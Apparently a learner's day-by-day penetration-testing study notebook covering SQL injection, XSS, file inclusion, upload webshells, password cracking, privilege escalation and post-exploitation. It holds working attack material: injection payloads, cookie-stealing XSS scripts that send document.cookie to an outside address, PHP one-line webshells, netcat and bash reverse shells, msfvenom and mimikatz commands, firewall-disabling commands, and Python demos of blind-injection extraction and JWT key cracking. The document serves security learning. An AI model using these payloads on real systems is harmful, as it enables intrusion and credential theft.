The Road to Network Security: My Systematic Penetration Testing Learning Framework


Note: The following content only records the relevant knowledge that I did not know when I was studying. The notes are sloppy and may be wrong, for reference only. I will gradually improve it!

Basically complete penetration testing framework

Day1

chmod: change file permissions

mv: move a file; also used to rename it

An HTTP request consists of:

Request line

Request headers

Request body

A GET request normally carries no request body (its parameters go in the URL query string)

GET vs POST

1. Where the request parameters go

-GET: in the URL query string; POST: in the request body

501 Not Implemented: the server does not support the request method

3xx: redirect

SQL injection:

1. Detect: inject ' or " and see whether the query breaks

2. Comment out the rest of the query: # or -- (with a trailing space)

Union query (union-based injection):

1. order by N to find the number of columns

2. union select 1,2 to find which columns are echoed on the page

3. Database: database()

4. Tables: information_schema.tables

5. Columns: union select column_name,2 from information_schema.columns where table_schema=database() and table_name='users'#

6. Content: union select user,password from users#

Testing one character of a result: and ascii(mid((select user from users limit 0,1),1,1))>96

Boolean-based blind injection:

and 1=1 (page unchanged)

and 1=2 (page changes)

Database: tested the same way with database()

Table: and exists(select * from users)

Column: and exists(select column_name from users)

Content: and (select user from users limit 1,1) ... compared character by character; select mid("hello world",2,1) returns one character starting at position 2, i.e. 'e'

0-9 start at 48 (0x30)

a-z start at 97 (0x61)

select ascii('A') returns 65

A-Z start at 65 (0x41)

URL encoding: starts with %, %20 is a space

Time-based blind injection with sleep(): select if(exists(select * from users),sleep(5),3) delays the response by 5 seconds when the condition is true
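The boolean-based extraction described above, as an added example that is not part of the original notes. The target database, the users table and its rows are constructed for the demo; the vulnerable query concatenates the id into the SQL string and reveals only whether a row came back, and extract() recovers a field with a binary search over the ASCII value of each character, the same idea as the and ascii(mid(...))>N probe. SQLite is used so it runs offline (SQLite spells mid() as substr() and ascii() as unicode()); safe_lookup() shows the parameterised fix.

```python
import sqlite3

# Constructed demo data, not from the original notes: a tiny users table that
# stands in for the target the notes exercise against.
_DB = sqlite3.connect(":memory:", check_same_thread=False)
_DB.executescript(
    "CREATE TABLE users(id INTEGER, user TEXT, password TEXT);"
    "INSERT INTO users VALUES (1,'admin','s3cret'),(2,'gordonb','abc123');"
)


def vulnerable_lookup(user_id: str) -> bool:
    """Simulated vulnerable page: the id is concatenated into the SQL string and
    the only thing the page reveals is whether a row came back."""
    sql = f"SELECT id FROM users WHERE id = {user_id}"
    return _DB.execute(sql).fetchone() is not None


def safe_lookup(user_id: str) -> bool:
    """The fix: a parameterised query, so the input is never parsed as SQL."""
    return _DB.execute("SELECT id FROM users WHERE id = ?", (user_id,)).fetchone() is not None


def oracle(condition: str) -> bool:
    """Boolean oracle: ' and 1=1' keeps the row, ' and 1=2' makes it disappear."""
    return vulnerable_lookup(f"1 and ({condition})")


def is_injectable() -> bool:
    """The and 1=1 / and 1=2 test from the notes."""
    return oracle("1=1") and not oracle("1=2")


def extract(column: str, table: str, row: int, max_len: int = 64) -> str:
    """Recover one field character by character. Each character costs about seven
    requests: a binary search on its code point with probes of the form
        and ascii(mid((select col from tbl limit row,1),i,1)) > N   (MySQL spelling)
    """
    value = ""
    sub = f"(SELECT {column} FROM {table} ORDER BY id LIMIT {row},1)"
    for i in range(1, max_len + 1):
        lo, hi = 0, 127  # the code point is somewhere in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({sub},{i},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end gives '', unicode('') is NULL: every probe is false
            break
        value += chr(lo)
    return value


if __name__ == "__main__":
    print("injectable:", is_injectable())
    print("users[0].user =", extract("user", "users", 0))
    print("users[1].password =", extract("password", "users", 1))
    print("safe lookup with payload:", safe_lookup("1 and (1=1)"))
```

Against a real target the oracle() function is the only thing to replace: send the probe as the parameter and compare the response (length, a keyword, or the delay for the sleep() variant) to decide true or false.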

Assignment: hub.docker.com

Exercises 3, 5, 9

docker pull

docker run

Day3:

concat("hello","world!") concatenates strings

select ord(':') shows the ASCII code

hex(68) shows the hexadecimal value

group_concat(username,0x3a,password) displays all rows on one line (0x3a is ':')

-Error-based injection:

-floor: select floor(rand(0)*2), combined with count(*) and group by, makes the duplicate-key error message leak the concatenated value

rand(0) is a seeded random number (therefore its sequence is predictable)

-updatexml(1,concat(0x7e,version(),0x7e),3): version() can be replaced by any SQL subquery; the error message echoes the value

-extractvalue works the same way

-Second-order injection: the payload is stored first and only triggers in a later query, e.g.

-insert into users values('admin','pwd')

-update users set pwd='123' where name='name'

-Universal password: a login bypass such as ' or 1=1#

-File reading and writing

-Prerequisites:

-The MySQL FILE privilege

-my.cnf/my.ini

-secure_file_priv="" (empty means no restriction; NULL disables file access entirely)

-Read files

-load_file('path') takes an absolute path

/etc/passwd stores user account information

-Write files

-into outfile 'path'

-into dumpfile 'path' (writes raw bytes, suited to binary files)

-Bypass techniques

-Replace or with ||, and with &&

-Case variation (e.g. SeLeCt)

-Double writing (e.g. oorr becomes or after one removal). To defend against this, filter in a loop until nothing more is removed

-Inline comments (/*!select*/)

-Space substitutes: %20, +, /**/, parentheses, %a0, %0b, %2b

-Comment terminators: #, --+ (close off the rest of the query)

-POST

-sqlmap

-Basic use

1. detect: sqlmap -u "url"
2. databases: sqlmap -u "url" --dbs / --current-db
3. tables: sqlmap -u "url" -D db --tables
4. columns: sqlmap -u "url" -D db -T tb --columns
5. content: sqlmap -u "url" -D db -T tb -C col --dump
For POST requests save the raw request to a file: sqlmap -r 1.txt
sqlmap -r 1.txt -vv -D security   (-v raises verbosity; -vv also shows the payloads that were sent)

-Writing tamper scripts (sqlmap --tamper)

-Command execution

-Command separators

; runs the next command regardless of the result

|| (or): runs the next command only if the previous one fails

| pipes the output into the next command

&& runs the next command only if the previous one succeeds; a single & puts the first command in the background and runs the next immediately

Useful commands to chain: wget, echo

-File inclusion

-C has #include<stdio.h>; PHP has include() and require()

config.inc.php usually holds the database credentials

Example: http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd

-LFI (local file inclusion)

-Whatever the extension, if the included file contains PHP code it is executed

-PHP pseudo-protocols (wrappers)

-php://filter/read=convert.base64-encode/resource=1.php returns the source base64-encoded instead of executing it

<?php

system('whoami');

?>

-RFI (remote file inclusion)

-http://localhost:8001/vulnerabilities/fi/?page=http://192.168.38.1/1.txt includes a file from a remote server (requires allow_url_include=On)

-XSS (HTML/JavaScript injection)

-JavaScript payloads

-document.cookie reads the cookie

-Stored XSS

<script>document.location='http://your-address/?'+document.cookie</script>

<script>

document.write("<img src='http://your-address/?"+document.cookie+"'/>");

</script>

-File upload (intercept the request in Burp, send it to Repeater, modify the extension)

-One-line webshells (PHP superglobals are case-sensitive: $_POST, $_GET)

<?php @eval($_POST[1]);?>

<?php @system($_GET[1]);?>

<?php $_GET[0]($_POST[1]);?>   when connecting, append ?0=assert to the URL

Client tools:

AntSword

Principle: parameter 1 carries @eval(base64_decode($_POST[2])); and parameter 2 carries the base64-encoded real command, e.g. system('ls ../');

-Checks to bypass

-Client-side JavaScript check (disable it, or edit the request in the proxy)

-Extension blacklist

-Case variation; alternative extensions php3, php4, php5, phtml

Apache:

-.htaccess

Content: AddType application/x-httpd-php .gif   Meaning: parse .gif files as PHP

-MIME type

-image/gif

-image/png   These are the Content-Type values of the upload

-image/jpeg

-File header (magic bytes)

-GIF89a is the GIF file header

-File content

<?php $_GET[0]($_POST[1]);?>  with ?0=assert

Day 6

-XSS

-BeEF (browser exploitation framework)

-BlueLotus (XSS receiving platform)

-File inclusion

-php://input (send the PHP code in the POST body)

-File upload

-%00 null-byte truncation

-WebGoat

-hashcat -a 0 -m 0 md5.hash wordlist-path   (-a 0 dictionary attack, -m 0 raw MD5)

Day7

-XXE (XML external entity injection)

chown changes the owner, e.g. chown www-data upload

chgrp changes the group

shutdown -r now reboots

init 0 shuts down

Day8

-JWT: JSON Web Token

-HS256 is HMAC-SHA256

hashcat -a 0 -m 1450 hash-file wordlist-path   (1450 is generic HMAC-SHA256 with key = password, fed as digest:message; hashcat also has a dedicated JWT mode, -m 16500, that takes the token directly)

import base64, hashlib, hmac

def hmac_base64(key, message):
    # JWT signature: base64url of the raw HMAC-SHA256 digest, without '=' padding
    return base64.urlsafe_b64encode(hmac.new(key, message, hashlib.sha256).digest()).rstrip(b"=")
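The HS256 signing, verification and dictionary attack described above, as an added example that is not part of the original notes. The signing key and the wordlist are constructed for the demo; the attack loop is the same thing hashcat -a 0 does, recomputing the HMAC with each candidate key until it matches the token's signature, and forge() then mints a token of its own with the recovered key. The alg check in verify_hs256() is the caveat a practitioner wants: without it a token with "alg":"none" and an empty signature would not be rejected by the signature comparison alone.

```python
import base64
import hashlib
import hmac
import json

# Constructed values for the demo (not from the original notes): the server's
# weak signing key and a small wordlist that happens to contain it.
DEMO_SECRET = b"secret123"
DEMO_WORDLIST = ["password", "123456", "secret123", "letmein"]


def b64url(data: bytes) -> str:
    """JWT uses base64url with the '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Build header.payload.signature; HS256 = HMAC-SHA256 over the first two parts."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, key: bytes):
    """Return the payload if the signature is valid, otherwise None."""
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":  # refuse alg=none and algorithm-confusion tokens
        return None
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):  # constant-time compare
        return None
    return json.loads(b64url_decode(body))


def crack_secret(token: str, wordlist):
    """Offline dictionary attack on the signing key (what hashcat -a 0 does)."""
    for word in wordlist:
        if verify_hs256(token, word.encode()) is not None:
            return word.encode()
    return None


def forge(token: str, new_payload: dict, wordlist):
    """Recover the key from a captured token, then sign a payload of our choosing."""
    key = crack_secret(token, wordlist)
    return None if key is None else sign_hs256(new_payload, key)


if __name__ == "__main__":
    captured = sign_hs256({"sub": "guest"}, DEMO_SECRET)
    print("captured:", captured)
    print("key:", crack_secret(captured, DEMO_WORDLIST))
    print("forged admin token valid:", verify_hs256(forge(captured, {"sub": "admin"}, DEMO_WORDLIST), DEMO_SECRET))
```

The defence is simply a long random key: with 32 or more random bytes the dictionary loop never terminates usefully, which is why weak HS256 secrets, not HMAC itself, are the finding.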

Day9

-OWASP Top 10

-Sensitive data exposure

-in transmission

-in storage

-Insecure deserialization

<?php

$aaa=array("1","2",123);

echo serialize($aaa);

?>

result: a:3:{i:0;s:1:"1";i:1;s:1:"2";i:2;i:123;}
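To make the serialized string above concrete, here is an added example (not from the original notes) that rebuilds and parses PHP's serialize() format in Python. The test strings are constructed for the demo. The point for deserialization attacks is the O: form: unserialize() on attacker-controlled input instantiates whatever class name is in the string, which is how magic methods such as __wakeup() and __destruct() end up running on attacker-chosen property values. Only scalars, arrays and plain objects are handled here.

```python
# Added example, not from the original notes: a minimal PHP serialize()/unserialize()
# in Python for the scalar, array and object cases.


def php_serialize(value) -> str:
    """Mirror of PHP serialize() for None/bool/int/float/str/list/dict."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'   # PHP counts bytes, not characters
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))                # a PHP list is an array keyed 0..n-1
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def php_unserialize(text: str):
    """Parse a serialized PHP value. Objects come back as (class_name, {property: value})."""
    data = text.encode()
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError("trailing data after the value")
    return value


def _parse(data: bytes, pos: int):
    tag = chr(data[pos])
    if tag == "N":                                     # N;
        return None, pos + 2
    if tag in "bid":                                   # b:1;  i:123;  d:1.5;
        end = data.index(b";", pos)
        raw = data[pos + 2:end].decode()
        value = {"b": lambda s: s == "1", "i": int, "d": float}[tag](raw)
        return value, end + 1
    if tag == "s":                                     # s:3:"abc";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                              # skip :"
        end = start + length                           # the byte length decides where the
        if data[end:end + 2] != b'";':                 # string ends, so a ';' or '"' inside
            raise ValueError("bad string length")      # the string cannot confuse the parser
        return data[start:end].decode(), end + 2
    if tag in "aO":                                    # a:2:{...}   O:4:"Name":1:{...}
        pos += 2
        name = None
        if tag == "O":
            colon = data.index(b":", pos)
            name_len = int(data[pos:colon])
            name = data[colon + 2:colon + 2 + name_len].decode()
            pos = colon + 2 + name_len + 2             # past the closing quote and ':'
        colon = data.index(b":", pos)
        count = int(data[pos:colon])
        pos = colon + 2                                # skip :{
        items = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            items[key], pos = _parse(data, pos)
        if data[pos:pos + 1] != b"}":
            raise ValueError("missing closing brace")
        return (items if name is None else (name, items)), pos + 1
    raise ValueError(f"unknown type tag {tag!r} at offset {pos}")


if __name__ == "__main__":
    print(php_serialize(["1", "2", 123]))
    print(php_unserialize('O:4:"Evil":1:{s:3:"cmd";s:6:"whoami";}'))
```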

Books: "OWASP Testing Guide"

"The Web Application Hacker's Handbook" (the Chinese edition is titled "Hacker Attack and Defense Technology Collection: Web Actual Combat")

Websites:

vulhub.org  vulnerable lab environments

vulnhub.com

-Frameworks

-Flask

-Multithreading

Day10

-CISP (Certified Information Security Professional, the Chinese certification)

Useful websites:

-ip138 (IP / domain lookup)

-licence

Security products:

-Gateway class: EW, ZPS, FS

-Endpoint class: AV, patch management, NAC (network access control), EDR, DLP

-Audit class: log audit, database audit, VPN, bastion host

-Monitoring class: APT detection, SOC, honeypot

Day 11:

-MLPS (等保, China's Classified Protection of Cybersecurity scheme)

Day12:

-Webshell implementation on PHP 7

-One-line webshell

-PoC: proof of concept

-Payload

-Link layer: CRC checksum

-Network layer: packet, header only

-DNS resolution uses UDP; zone transfers between servers use TCP

-vi commands

-x deletes the current character

-dd deletes the current line

-comm -1 1.txt 2.txt compares two sorted files; -1 suppresses the lines only in the first file, leaving the lines only in the second and the lines common to both

-diff 1.txt 2.txt shows the differences

-diff -c 1.txt 2.txt context format; -u unified format

-vimdiff 1.txt 2.txt

-ps lists processes

-tail 1.txt

-tail -f 1.txt follows the file as it grows (a vim save replaces the file with a new inode, so tail -f does not pick those edits up)

-watch -n 5 command: re-runs the command every 5 seconds

-watch -n 5 w monitors the w command

-wget downloads a file

-curl -o downloads a file to the given name

-Environment preparation

-Windows 7

-Windows Server 2008 R2 https://msdn.itellyou.cn/

-Linux

-Ubuntu 14 / Metasploitable2 from vulnhub.com

-Tools

-Swiss army knife: netcat

-nc -lvp 3333 listens on a port

-nc localhost 4444 connects to a port (-l means listen, so it is not used when connecting)

-n do not resolve DNS names

-v verbose output

-e program to run once the connection is made

-File transfer

-Receiver: nc -lvp 4444 > 1.txt

-Sender: nc ip/domain-name port < 1.txt

-Bind shell

-Server: nc -lvp 444 -e cmd.exe

-Attacker: nc -nv ip port

-Reverse shell

-Attacker

-nc -lvp 444

-Target

-nc -nv ip port -e cmd.exe

Day12

-Information gathering

-Active

-DNS

-Ports / OS

-nmap

-nmap -p- -Pn -n ip   (all ports, skip host discovery, no DNS)

-nmap -p 21 -sV -Pn -n --script=xx ip   (service version plus an NSE script)

-nmap -O ip   (OS detection)

-nmap -A -F ip   (aggressive scan of the 100 most common ports)

-nmap -Pn -n --script=ftp-vsftpd-backdoor 192.168.174.129

-Vulnerability scan

-Nessus on Debian 6 amd64: sudo dpkg -i ./Nessus-xxxx.deb; sudo service nessusd start

-Web scan

-AWVS

-IBM AppScan

-HP WebInspect

-xray

-xray webscan --listen 127.0.0.1:7777 --html-output 1.html

-Combined with Burp

-Set an upstream proxy under User options > Connections

-destination host: ip

-proxy host: 127.0.0.1

-proxy port: 7777

-Passive

-whois registration information

-Webmaster's Home (chinaz.com)

-ThreatBook (微步在线)

-Google hacking

  • -site:
  • -filetype: file type; prefixing the operator with - excludes that type
  • -inurl:
  • -error messages that the site has leaked
  • -GHDB (Google Hacking Database)

-Record

megacorpone.com (the OSCP lab domain)

-Password cracking

-Dictionaries

Wordpass.com

-Generating (social-engineering dictionaries)

-cewl: cewl -d 2 -m 6 -w ./1.txt http://www.megacorpone.com   (crawl depth 2, minimum word length 6)

sudo apt install crowbar

Online cracking (remote): medusa, hydra

Network services (db, ftp, ssh, rdp)

Web: Burp

HTTP basic auth

Offline cracking (local): hashes; the hashid command identifies which kind of hash it is

-Windows

C:\Windows\System32\config\SAM (a registry hive; the SYSTEM hive holds the key needed to decrypt it)

-Hash type: NT/NTLM

-Tools: pwdump7 / samdump2

-Linux

-/etc/passwd

-/etc/shadow

-$6$ hashes are sha512crypt

-Rainbow tables:

-Plaintext in memory

-mimikatz

privilege::debug

sekurlsa::logonpasswords

-MySQL

-Other hashes

Day14

-Implementation process

Communicate with the customer's technical point of contact

-Well-known (system) port range: 0-1023

Firewall / IPS / ICG deployment modes

-Bridge mode (transparent mode)

-In-band management

-Out-of-band management

-Routing mode (not commonly used)

-Bypass (mirror) mode

Day15

-ICG management methods

-Web

-Console: baud rate 9600, icgadmin/netentsec

-SSH (port 13289)

-Default management address of the firewall: https://10.0.0.1

msfvenom

From <https://blog.csdn.net/ZmeiXuan/article/details/78061755>

Policy routing priority

-Host route -> directly connected route -> static route (including dynamic routes) -> policy route -> ISP route -> default route

Day16

-Vulnerability analysis / exploitation

-Application layer: web

-General: OWASP Top 10

-CMS: WordPress / Discuz / Joomla

-Development frameworks

-PHP: ThinkPHP

-Java: SSM (Spring + SpringMVC + MyBatis)

-Python: Flask / Django

-General components: es

-Middleware: Tomcat / WebLogic

CVE / exploit-db (a website) / searchsploit (its offline copy)

-Databases:

-Relational: MySQL, MSSQL, Oracle

-Non-relational: Redis / MongoDB

-Operating system

-Windows

-445 (SMB)

-Linux

-Dirty COW (dirtycow)

-Network layer:

Variables in PHP start with $

Fuzz: fuzz testing

phpinfo()

substring(database_version(),1,1)

From

whoami

Nothing is absolutely secure

GitHub: lists

Kali restart network commands

sudo systemctl restart networking

sudo systemctl restart NetworkManager

Port range 0-65535

2 Mbps = 0.25 MB/s

Default account/password for all QiAnXin products:

Admin/!1ws

Writing a one-line webshell under Linux: watch the shell escaping

Low privilege:

Privilege escalation:

-Local / remote

-Exploit OS vulnerabilities

-Database

-Third-party software

Exploit file types

-.py

-.php

-.pl Perl

-.rb Ruby, generally used by msf

-.c run after compiling with gcc

-.txt/.md write-ups, mostly for webapps

-Scan for admin/back-end paths

-dirb tool

Linux permissions

-rw-r--r-- 1   The number is the hard-link count; for a directory it is at least 2 because of its own entry and the . entry inside it (each subdirectory's .. adds one more)

The mode string has 10 characters: the file type, then the user / group / other triplets

-: regular file

d: directory

l: symbolic link (shortcut)

b/c: block / character device file

-rwsr-xr-x: the s (SUID) means other users execute the file with the privileges of the file owner

In octal that is 4755; the other special bit shows as t (sticky bit, as on /tmp, octal 1777)

There are many privilege-escalation write-ups on GitHub for Linux and Windows

In the passwd file:

root:x:0:0:root:/root:/bin/bash   the x is a placeholder for the password, which lives in /etc/shadow; an empty field means no password

In the shadow file:

root:!:18470:0:99999:7:::   the ! means password login is disabled (locked); 18470 is the number of days since 1 January 1970 on which the password was last changed

Linux firewall

iptables

setenforce (SELinux enforcing / permissive)

View OS information:

/etc/os-release

lsb_release -a

Users added under /etc/sudoers.d can use sudo

Find files with the SUID bit: sudo find / -perm -4000 2>/dev/null

touch creates a file

echo "`command`"   backquotes execute the content as a command and substitute its output
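The mode-string and shadow-file notes above, as an added example that is not part of the original notes: mode_to_octal() turns an ls -l mode such as -rwsr-xr-x into 4755 (the SUID bit that find / -perm -4000 looks for), and parse_shadow() interprets one /etc/shadow line, including the locked marker and the days-since-epoch field. The sample lines are constructed for the demo; the root line is the one the notes show.

```python
import datetime

# $id$ prefixes used by crypt(3) on Linux
SHADOW_ALGORITHMS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def mode_to_octal(mode: str) -> str:
    """Turn an ls -l mode string into its 4-digit octal form:
    '-rwsr-xr-x' -> '4755' (SUID), 'drwxrwxrwt' -> '1777' (sticky), '-rw-r--r--' -> '0644'.
    Lowercase s/t = special bit plus execute; uppercase S/T = special bit without execute."""
    if len(mode) != 10:
        raise ValueError("expected a 10-character mode string such as -rwxr-xr-x")
    special = 0
    digits = []
    for who, triplet in enumerate((mode[1:4], mode[4:7], mode[7:10])):
        r, w, x = triplet
        value = (4 if r == "r" else 0) + (2 if w == "w" else 0) + (1 if x in "xst" else 0)
        if who == 0 and x in "sS":
            special |= 4      # SUID: run with the owner's privileges
        elif who == 1 and x in "sS":
            special |= 2      # SGID: run with the group's privileges
        elif who == 2 and x in "tT":
            special |= 1      # sticky: only a file's owner may delete it from the directory
        digits.append(str(value))
    return f"{special}{''.join(digits)}"


def has_suid(mode: str) -> bool:
    """The test behind  find / -perm -4000 : is the SUID bit set?"""
    return int(mode_to_octal(mode)[0]) & 4 != 0


def parse_shadow(line: str) -> dict:
    """Interpret one /etc/shadow entry (9 colon-separated fields)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("a shadow entry has 9 colon-separated fields")
    name, secret, last_change, _min_age, max_age, _warn, _inactive, _expire, _ = fields
    hashed = secret.lstrip("!")          # a '!' prefix locks the account but keeps the hash
    algo = SHADOW_ALGORITHMS.get(hashed.split("$")[1], "unknown") if hashed.startswith("$") else None
    epoch = datetime.date(1970, 1, 1)
    return {
        "user": name,
        "locked": secret.startswith(("!", "*")),          # password login disabled
        "no_password": secret == "",                      # empty field: logs in without a password
        "algorithm": algo,
        "last_change": (epoch + datetime.timedelta(days=int(last_change))).isoformat()
                       if last_change else None,
        "max_age_days": int(max_age) if max_age else None,
    }


if __name__ == "__main__":
    # Constructed sample lines for the demo
    print(mode_to_octal("-rwsr-xr-x"), has_suid("-rwsr-xr-x"))
    print(parse_shadow("root:!:18470:0:99999:7:::"))
    print(parse_shadow("tom:$6$abc$xyz:18470:0:99999:7:::"))
```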

DAY17

-Windows basics

Help for a command: command /?

-System information

ver

winver

systeminfo

-Users

-Computer management: compmgmt.msc

-The SAM is stored in the registry; the editor is regedit

Group policy editor: gpedit.msc

SID (RID of the built-in accounts):

Administrator 500

Guest 501

net user   lists users

net user username password   changes the password

net user username /active:yes   enables the account

See the help output for the rest

Adding $ to the end of a user name hides it from net user

net localgroup administrators   shows the members of this group

-Firewall

Turn off the firewall

-net stop sharedaccess

-netsh firewall set opmode disable

-netsh advfirewall set allprofiles state off

-Enable RDP (3389)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

-View the RDP port

-reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

After generating the payload with msfvenom, start msfconsole and run: use exploit/multi/handler

-Set an environment variable

-export

su tom   switches user

Day18

-gobuster tool

nmap privilege escalation (when it is SUID or allowed via sudo)

git privilege escalation

awk privilege escalation

msf listener: exploit/multi/handler; msfvenom generation: msfvenom -p payload LHOST=ip LPORT=port -f exe -a x64 -o shell.exe

Day19

Firewall

-Turn off the firewall on Linux

-service iptables stop

-systemctl

-bash -i >& /dev/tcp/ip/port 0>&1   (bash reverse shell)

-PowerShell

-Port forwarding

-msf can do it (portfwd in meterpreter)

rdesktop tool command: rdesktop ip

Step one: generate a reverse-connect exe with msfvenom and deliver it to the target

Step two: start the listener in msfconsole; the target runs the exe

Step three: once the session is established, run the port-forwarding command for the remote desktop port

Step four: connect to your own forwarded 3389 with rdesktop

VM network

-NAT

-Bridged

-Host-only

Linux default proxychains config: /etc/proxychains.conf

For nmap scans it is best to add -Pn (skip the ping / host-discovery phase): a host that drops ICMP would otherwise be reported as down and never port-scanned

Day20

msf post-exploitation modules

Cobalt Strike: red team

Channels (C2 over):

-DNS / ICMP

Behinder (冰蝎) webshell client; Xici proxy (西刺代理, free proxy IP list for rotating source addresses)

Kerberos authentication in a Windows domain: golden ticket, SSO

-TGT: ticket granting ticket

The privilege escalation modules often used in msf against a domain: search psexec

Day21

File transfer

FTP

-FileZilla Server / Serv-U

-pure-ftpd / vsftpd

put and get

HTTP

echo $webclient = New-Object System.Net.WebClient >> wget.ps1   create a web client on Windows

echo $url = "http://192.168.174.128:4444/hello.txt" >> wget.ps1   address of the file on Kali

echo $file = "exploit.txt" >> wget.ps1   name to save the file as on Windows

echo $webclient.DownloadFile($url,$file) >> wget.ps1   download the file

The following requires a web server to be running on Kali first

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File filename   or

powershell.exe -ExecutionPolicy Bypass -File filename

powershell.exe (New-Object System.Net.WebClient).DownloadFile

Antivirus bypass

-Signature bypass

-Sandbox

Static analysis

-PE / ELF

-IDA Pro

Dynamic analysis

-Debugging

-Sandbox: behaviour monitoring of files / registry / network connections

Shellter tool: injects code into a normal PE file such as notepad.exe; the host must be a 32-bit program

Empire tool: similar to msf, written in PowerShell, mostly PowerShell modules

Persistence

-Windows

-Shift (sticky keys)

sethc.exe

-Image hijacking (IFEO)

-Remote-control trojan

-Linux

-SUID

-LD_PRELOAD

Cleaning up traces

Metasploitable3 target penetration

The binwalk command checks whether an image has other files embedded in it and extracts them

knock ip port

Check knockd.conf to see whether port knocking is in use

View file attributes on Windows

attrib

Encryption on Windows: EFS and

BitLocker (full-disk encryption)

icacls on Windows is the command to change permissions

lsattr views file attributes on Linux

Intranet pivoting proxy: VPN or frp cannot be used

To be continued...
